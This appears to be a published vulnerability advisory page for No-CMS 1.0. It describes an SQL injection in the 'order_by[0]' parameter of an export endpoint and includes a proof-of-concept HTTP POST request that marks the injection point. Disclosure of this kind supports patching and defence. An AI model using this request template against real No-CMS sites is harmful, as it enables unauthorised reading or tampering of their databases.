No-Cms 1.0 SQL Injection

2018.11.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: No-Cms 1.0 - 'order_by' SQL Injection # Date: 2018-11-28 # Exploit Author: Loading Kura Kura # Vendor Homepage: https://github.com/goFrendiAsgard/No-CMS # Software Link: https://codeload.github.com/goFrendiAsgard/No-CMS/zip/master # Tested on: Win10/Kali Linux # Google Dork: n/a # Version: n/a # CVE : # No-CMS is a CMS-framework. # No-CMS is a basic and "less-assumption" CMS with some default features such as # user authorization (including third party authentication), menu, module and theme management. # It is fully customizable and extensible, you can make your own module and your own themes. # It provide freedom to make your very own CMS, which is not provided very well by any other CMS. # POC #Sqli injection { order_by[0] } POST /nocms/main/manage_privilege/index/export HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/nocms/main/manage_privilege Content-Type: application/x-www-form-urlencoded Content-Length: 76 Connection: close Cookie: bb9865483ae270ceba27539501d10599=rf0at4ehbd1ttckd85skvf17ssq4dfh2; crud_page_a36781f1e31bde68770f40381aad7df6=1; per_page_a36781f1e31bde68770f40381aad7df6=25; hidden_ordering_a36781f1e31bde68770f40381aad7df6=asc; hidden_sorting_a36781f1e31bde68770f40381aad7df6=index; search_text_a36781f1e31bde68770f40381aad7df6=; search_field_a36781f1e31bde68770f40381aad7df6=; 3c158ec1144ba8bb0dd8a7ca03988b5c=e4p2j92lle03vpp6ccuv2c8dro86ebep; crud_page_710a7d8c82ae37e845c3da5df1073379=1; per_page_710a7d8c82ae37e845c3da5df1073379=25; hidden_ordering_710a7d8c82ae37e845c3da5df1073379=desc; hidden_sorting_710a7d8c82ae37e845c3da5df1073379=date; search_text_710a7d8c82ae37e845c3da5df1073379=dd; search_field_710a7d8c82ae37e845c3da5df1073379=sec0e67fc; __secret_code=d282ef263719ab842e05 Upgrade-Insecure-Requests: 1 search_text=&search_field=/**/&per_page=25&order_by[0]=[INJECT HERE]&order_by[1]=&page=1 ========================= Regards Loading Kura Kura thanks To : Siluman IWAK Siluman Cupatkai Siluman TUMO dan kamu sayang :*


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top